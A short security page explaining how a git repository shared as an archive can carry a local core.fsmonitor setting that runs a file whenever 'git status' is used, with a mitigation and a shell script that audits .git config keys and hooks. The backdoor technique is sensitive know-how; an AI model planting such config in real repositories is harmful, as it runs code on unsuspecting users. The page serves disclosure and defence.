An innocuous example of a significant git backdoor.
Expanding the Base64-encoded tarball payload yields a minimal example git repository.
base64 -di | tar xz
# (paste the base64 data, hit return, then press Ctrl+D)
# You will have a new repo folder called `ouchy`

Simply running `git status` inside of it will cause a file to be executed.
Exploit explained
This requires the local repository's configuration to use the fsmonitor hook callback, and an executable file to be present.
A plain clone should not carry such an item, because cloning does not copy the repository-local configuration. However, any script from a repo can surreptitiously modify
a repository database, which could in turn become a sleeper that calls home, curls code, and downloads executable scripts.
Beware!
Mitigation
Only get git repositories via cloning, never via any regular file sync or archive!
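
For a repository that did arrive as an archive or file sync, the following added example (not part of the original page) inspects it without running any git command inside it. The function name `audit_git_dir` and the list of keys are assumptions of this example: `core.fsmonitor` is the setting behind the fsmonitor callback described above, and the other keys are further git settings that name a command or pull in more configuration. The list is not exhaustive.

```sh
#!/bin/sh
# Added example (not from the original page): inspect a repository that came
# from an archive or file sync WITHOUT running any git command inside it.
# The key list below is an assumption of this example and is not exhaustive.

audit_git_dir() {
    gitdir="$1/.git"
    findings=0
    if [ -f "$gitdir/config" ]; then
        # Report keys whose value git runs as a command or loads as more
        # config. Section and key names are case-insensitive in git.
        hits=$(awk '
            /^[ \t]*\[/ {
                sec = tolower($0)
                sub(/^[ \t]*\[[ \t]*/, "", sec)   # drop the opening bracket
                sub(/[] \t".].*$/, "", sec)       # keep the section name only
                sub(/^[^]]*\][ \t]*/, "")         # a key may follow on this line
            }
            /^[ \t]*[A-Za-z][A-Za-z0-9-]*[ \t]*=/ {
                line = $0
                sub(/^[ \t]*/, "", line)
                key = tolower(line)
                sub(/[ \t]*=.*$/, "", key)
                full = sec "." key
                if (full ~ /^(core\.(fsmonitor|sshcommand|hookspath|pager|editor)|filter\.(clean|smudge|process)|diff\.(external|textconv)|include(if)?\.path)$/)
                    print "CONFIG " full ": " line
            }' "$gitdir/config")
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits"
            findings=1
        fi
    fi
    # Executable hooks also run on ordinary git commands; *.sample files do not.
    for h in "$gitdir"/hooks/*; do
        case "$h" in *.sample) continue ;; esac
        if [ -f "$h" ] && [ -x "$h" ]; then
            printf 'HOOK %s\n' "$h"
            findings=1
        fi
    done
    return "$findings"
}

# Usage: sh audit.sh /path/to/unpacked/repo   (exit status 1 means findings)
if [ $# -gt 0 ]; then audit_git_dir "$1"; exit $?; fi
```

Run it from outside the unpacked directory; a `CONFIG core.fsmonitor` line is the condition this page describes.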